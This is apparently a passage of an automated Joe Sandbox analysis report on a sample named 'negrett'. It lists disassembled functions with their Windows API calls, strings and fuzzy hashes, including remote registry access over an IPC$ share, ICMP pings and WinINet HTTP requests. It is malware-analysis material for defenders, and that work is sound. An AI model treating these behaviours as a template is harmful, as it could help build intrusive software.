Function 00B28BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B28F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00B28FC5

DestroyWindow.USER32 ref: 00B28C81
KillTimer.USER32 ref: 00B28D1B
DestroyAcceleratorTable.USER32 ref: 00B66973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00B28BBA,00000000,?), ref: 00B669A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00B28BBA,00000000,?), ref: 00B669B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B28BBA,00000000), ref: 00B669D4
DeleteObject.GDI32(00000000), ref: 00B669E6

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 7699592466685020968bb28ba079794c1e06b2cdf514a3de4060345784c74c61
Instruction ID: bae18e52b0cde7ca2938dfa971a09973a8e3df53950ae13e47c9b87182e7b27d
Opcode Fuzzy Hash: 7699592466685020968bb28ba079794c1e06b2cdf514a3de4060345784c74c61
Instruction Fuzzy Hash: 5D61AE31502660DFDB259F18EA89B297BF1FF45312F2449ADE04A9B5A0CF35AC91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B706DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B16B57: _wcslen.LIBCMT ref: 00B16B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B707A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B707BE
RegOpenKeyExW.ADVAPI32 ref: 00B707DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00B70804
CLSIDFromString.OLE32(?,000001FE), ref: 00B7082C
RegCloseKey.ADVAPI32(?), ref: 00B70837
RegCloseKey.ADVAPI32(?), ref: 00B7083C

Strings

\CLSID, xrefs: 00B70724
SOFTWARE\Classes\, xrefs: 00B7070E
\IPC$, xrefs: 00B70784

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 81a20aad3e6e744cc163eedce303b9d685fc6d88ab41ed47893f5457e1a8a5cc
Instruction ID: 41ffbd385eeab4f4a90dad2b3060322c10f43ec2ca77d6d05c8293f606a189f6
Opcode Fuzzy Hash: 81a20aad3e6e744cc163eedce303b9d685fc6d88ab41ed47893f5457e1a8a5cc
Instruction Fuzzy Hash: 9441E872C10229EBDF25EBA4DC958EDB7B8FF04750B5441AAE915A3161EB30AE44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A5FD1E Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 372COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A5FE01
_wcslen.LIBCMT ref: 02A5FE8A
_wcslen.LIBCMT ref: 02A5FF06
_wcslen.LIBCMT ref: 02A5FF81

Part of subcall function 029EEDF2: _wcslen.LIBCMT ref: 029EEDFD

Strings

0{L, xrefs: 02A6004E
lgL, xrefs: 02A5FF97
`}L, xrefs: 02A5FE17
{L, xrefs: 02A6013E
@|L, xrefs: 02A60097

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: {L$0{L$@|L$`}L$lgL
API String ID: 176396367-1937145518
Opcode ID: 0d706242c2a0dbafdc1c0f9a3adb8007824529ebefb0d02c43683025eda856c5
Instruction ID: 166cf62401fdbde6dd21397947160d073005eb41e5d98ed6b875ac144f8d6dda
Opcode Fuzzy Hash: 0d706242c2a0dbafdc1c0f9a3adb8007824529ebefb0d02c43683025eda856c5
Instruction Fuzzy Hash: EBE18F352083118FCB14DF24C590A2AB7E2BF89354F14895DF8969B761DB35ED49CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02A5BD98 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 242COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A5BDF1
_wcslen.LIBCMT ref: 02A5BE68
_wcslen.LIBCMT ref: 02A5BE9E
_wcslen.LIBCMT ref: 02A5BEF9
_wcslen.LIBCMT ref: 02A5BF2F
_wcslen.LIBCMT ref: 02A5BF7F

Strings

4wL, xrefs: 02A5BF29
hwL, xrefs: 02A5BFAC
@wL, xrefs: 02A5BF79

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: 4wL$@wL$hwL
API String ID: 176396367-462698015
Opcode ID: 14acc0bdb987110b7d5a089c68d16b417f5c68108f78ca02a8b0f493d2635f26
Instruction ID: 3eefaeb085098084fc62dd4c7f87b207248cfa499ca3df2a66e98215a8e72f65
Opcode Fuzzy Hash: 14acc0bdb987110b7d5a089c68d16b417f5c68108f78ca02a8b0f493d2635f26
Instruction Fuzzy Hash: 2F71F8326001368BCB209F7C8D906BF73A2AF5066DB14492AFC6697298EF35CD45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B9055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B905BC
inet_addr.WSOCK32(?), ref: 00B9061C
gethostbyname.WSOCK32(?), ref: 00B90628
IcmpCreateFile.IPHLPAPI ref: 00B90636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B906C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B906E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00B907B9
WSACleanup.WSOCK32 ref: 00B907BF

Strings

Ping, xrefs: 00B90676

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 6a7c4bedfcfd630c5cf631aa73c47abc115d5b425dc32a4caac33762159b52a7
Instruction ID: 9d7d2355815f578fb610f0aa229a3df3adba3c9ebb6d8ea12bd59f20538da499
Opcode Fuzzy Hash: 6a7c4bedfcfd630c5cf631aa73c47abc115d5b425dc32a4caac33762159b52a7
Instruction Fuzzy Hash: 44919D356182019FDB20EF15C489F1ABBE0EF44328F1585E9F4699B6A2CB34EC85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B98CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B98CF3

Part of subcall function 00B78E54: _wcslen.LIBCMT ref: 00B78E77

_wcslen.LIBCMT ref: 00B98D4E
_wcslen.LIBCMT ref: 00B98D9C
_wcslen.LIBCMT ref: 00B98DDC
_wcslen.LIBCMT ref: 00B98E6E

Strings

cdecl, xrefs: 00B98D48, 00B98D4D
none, xrefs: 00B98E65, 00B98E6A
winapi, xrefs: 00B98D96, 00B98D9B
stdcall, xrefs: 00B98DD6, 00B98DDB

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 9503e274aba99c7678df39455723939a3b6330799482a2665ed05ff68aebaa70
Instruction ID: 42d8903d1907e873435a2f034e3abe74e4196fb852737053a007733b8183b7cc
Opcode Fuzzy Hash: 9503e274aba99c7678df39455723939a3b6330799482a2665ed05ff68aebaa70
Instruction Fuzzy Hash: 0A519E32A005169BCF14DF68C9909BEB7E6EF66720B6142B9E426E7284EB31DD40C790

Uniqueness

Uniqueness Score: -1.00%

Function 00B88195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B88257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B88267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B88273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B88310
SetCurrentDirectoryW.KERNEL32(?), ref: 00B88324
SetCurrentDirectoryW.KERNEL32(?), ref: 00B88356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B8838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00B88395

Strings

*.*, xrefs: 00B8839B

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 4db13ee5216e7e3a53de7fc934aca930d9d08723b23b945c77541f1436fb7db5
Instruction ID: f95da6730b5362effa3786fa966feec44641a4e51e85d45ff46768c38636dace
Opcode Fuzzy Hash: 4db13ee5216e7e3a53de7fc934aca930d9d08723b23b945c77541f1436fb7db5
Instruction Fuzzy Hash: D5619E725043059FCB10EF64C8819AEB3E9FF89310F44899EF999D7261EB31E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02A02080 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02A02094
_free.LIBCMT ref: 02A020A0
_free.LIBCMT ref: 02A020AB
_free.LIBCMT ref: 02A020B6
_free.LIBCMT ref: 02A020C1
_free.LIBCMT ref: 02A020CC
_free.LIBCMT ref: 02A020D7
_free.LIBCMT ref: 02A020E2
_free.LIBCMT ref: 02A020ED
_free.LIBCMT ref: 02A020FB

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
Instruction ID: 5ad32a276c032faefbe04b5f0bd4598d7dfd6af6ae24e6736f500628c757e9b1
Opcode Fuzzy Hash: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
Instruction Fuzzy Hash: 35117476540209AFCB01EF54EA81CDD3BA6EF05350B5189A5FA0C9F2A1DE31EE51AF80

Uniqueness

Uniqueness Score: -1.00%

Function 00B42C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B42C94

Part of subcall function 00B429C8: HeapFree.KERNEL32(00000000,00000000), ref: 00B429DE
Part of subcall function 00B429C8: GetLastError.KERNEL32(00000000,?,00B4D7D1,00000000,00000000,00000000,00000000,?,00B4D7F8,00000000,00000007,00000000,?,00B4DBF5,00000000,00000000), ref: 00B429F0

_free.LIBCMT ref: 00B42CA0
_free.LIBCMT ref: 00B42CAB
_free.LIBCMT ref: 00B42CB6
_free.LIBCMT ref: 00B42CC1
_free.LIBCMT ref: 00B42CCC
_free.LIBCMT ref: 00B42CD7
_free.LIBCMT ref: 00B42CE2
_free.LIBCMT ref: 00B42CED
_free.LIBCMT ref: 00B42CFB

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 22b01c2edc8fbc798f4df4a31762c774177b3294f26ad74b381415d13fff956e
Instruction ID: a2143022d77fbb4ddb1544b0bce8b4bdf6a8ad191514c6b0e30f18f1fbad038b
Opcode Fuzzy Hash: 22b01c2edc8fbc798f4df4a31762c774177b3294f26ad74b381415d13fff956e
Instruction Fuzzy Hash: 83113F76510108AFDB02EF96D982CDD3BA9FF05350F9145A5FA489B322DA31EB50BB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A324F7 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A3258D
_wcslen.LIBCMT ref: 02A325F8

Strings

[L, xrefs: 02A3279A
[L, xrefs: 02A32746

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: [L$[L
API String ID: 176396367-175131883
Opcode ID: 52fb84ed20a601a6362a334e9d3866de97d3c6e346f7c12375178c5f42add9b6
Instruction ID: fca41943caa189037ef2d8d9438c6cb9e3e76cf1015f3e5b9cd69337801882ac
Opcode Fuzzy Hash: 52fb84ed20a601a6362a334e9d3866de97d3c6e346f7c12375178c5f42add9b6
Instruction Fuzzy Hash: 80E1C532A00616ABCB25DF78C890BEDFBB5BF44754F54811AF956A7240EF30AD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B29BB2

Part of subcall function 00B2912D: GetCursorPos.USER32(?), ref: 00B29141
Part of subcall function 00B2912D: ScreenToClient.USER32(00000000,?), ref: 00B2915E
Part of subcall function 00B2912D: GetAsyncKeyState.USER32 ref: 00B29183
Part of subcall function 00B2912D: GetAsyncKeyState.USER32 ref: 00B2919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00BA8B6B
ImageList_EndDrag.COMCTL32 ref: 00BA8B71
ReleaseCapture.USER32 ref: 00BA8B77
SetWindowTextW.USER32 ref: 00BA8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BA8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00BA8CFF

Strings

@GUI_DRAGFILE, xrefs: 00BA8C9A
@GUI_DROPID, xrefs: 00BA8C51

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: bae42f7bbcd146c2384e94b4a3accd7d10cca5ff40281e6a824fdce67d9d71a9
Instruction ID: 001a8aa7b533e8028301be8b3ecac4001257e4274f200ff8606b3454346fc6fc
Opcode Fuzzy Hash: bae42f7bbcd146c2384e94b4a3accd7d10cca5ff40281e6a824fdce67d9d71a9
Instruction Fuzzy Hash: D751AB70108340AFD700DF14DC96FAE7BE4FB89710F500AA9F996572A2DB70A944CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02A3A9C8 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A3AA08
_wcslen.LIBCMT ref: 02A3AA4D
_wcslen.LIBCMT ref: 02A3AA8C
_wcslen.LIBCMT ref: 02A3AAC7

Strings

|gL, xrefs: 02A3AAC1
`gL, xrefs: 02A3AA47
PgL, xrefs: 02A3AA02
lgL, xrefs: 02A3AA86

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: PgL$`gL$lgL$|gL
API String ID: 176396367-1235675864
Opcode ID: 04272a9f8043bf6173aa3c4bb54a4197faccdf722e489701af1eeecaaa0ab55d
Instruction ID: f64aeabd9a4150ac7b708949e606a3789c7f7850a8cf34904b7a3f5d6bb4631c
Opcode Fuzzy Hash: 04272a9f8043bf6173aa3c4bb54a4197faccdf722e489701af1eeecaaa0ab55d
Instruction Fuzzy Hash: 5D41D933E011369BCB115F7CCED06BE77A6AF50658B15812AF5A2D7281FB35C981C790

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B8C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B8C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B8C2CA
GetLastError.KERNEL32 ref: 00B8C322
SetEvent.KERNEL32(?), ref: 00B8C336
InternetCloseHandle.WININET(00000000), ref: 00B8C341

Strings

, xrefs: 00B8C2BB

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: b7e9bf6a0d130054b814c66cab49321aac5f8c0dc1d553df71ef18d92915bf0c
Instruction ID: 632e8af47ee5133ccbcfb9ffa77cfdb11911ad3cf7cd95aa682c75c3ac809826
Opcode Fuzzy Hash: b7e9bf6a0d130054b814c66cab49321aac5f8c0dc1d553df71ef18d92915bf0c
Instruction Fuzzy Hash: 613189F1600208AFD721AFA49C89AAB7FFCEB4A744B10855EF44693220DB34DD05CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00B7209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B720AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00B720C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B7214D

Strings

smallicons, xrefs: 00B72115
largeicons, xrefs: 00B720E1
list, xrefs: 00B7212F
details, xrefs: 00B720FB
SHELLDLL_DefView, xrefs: 00B720CC

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: c719548a99dd73f097bf63a3b746020cb7bc958acf6833f9058bd0a25272b510
Instruction ID: 049321922e9997a891d4eeb722c808c0f2ea160986005dc9e76b25bb929b3540
Opcode Fuzzy Hash: c719548a99dd73f097bf63a3b746020cb7bc958acf6833f9058bd0a25272b510
Instruction Fuzzy Hash: FE112976688706B9FA116724DC07DA677DCEB05324F7040E7FB18B65E1FF6168015614

Uniqueness

Uniqueness Score: -1.00%

Function 00B28B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00B66890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B668A9
LoadImageW.USER32 ref: 00B668B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B668D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B668F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B28874,00000000,00000000,00000000,000000FF,00000000), ref: 00B66901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B6691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B28874,00000000,00000000,00000000,000000FF,00000000), ref: 00B6692D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: e90618561b3259f7af5c97c341f622b3a1cb74a48c90ee19f08f8178e3ba03f6
Instruction ID: 01eee41b42f6c8f9657bf60aba6b353c8b6736b08fcb2ed0d414041a49ce8062
Opcode Fuzzy Hash: e90618561b3259f7af5c97c341f622b3a1cb74a48c90ee19f08f8178e3ba03f6
Instruction Fuzzy Hash: EE518970A00209AFDB20CF28DC9AFAA7BF5EF58750F104558F91A972A0DB71E990DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B8C182
GetLastError.KERNEL32 ref: 00B8C195
SetEvent.KERNEL32(?), ref: 00B8C1A9

Part of subcall function 00B8C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B8C272
Part of subcall function 00B8C253: GetLastError.KERNEL32 ref: 00B8C322
Part of subcall function 00B8C253: SetEvent.KERNEL32(?), ref: 00B8C336
Part of subcall function 00B8C253: InternetCloseHandle.WININET(00000000), ref: 00B8C341

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 947cd8c1de3e2fc77d7e8608efd7432fa61da083f661d584016000d26e83fee2
Instruction ID: 17d82ed48464821c582f08f596331026598d23c83adcec23366dcdbaefc20ea1
